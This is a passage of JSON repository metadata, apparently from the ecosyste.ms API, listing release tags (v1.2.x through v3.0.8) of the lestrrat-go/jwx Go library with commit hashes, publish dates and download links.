pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v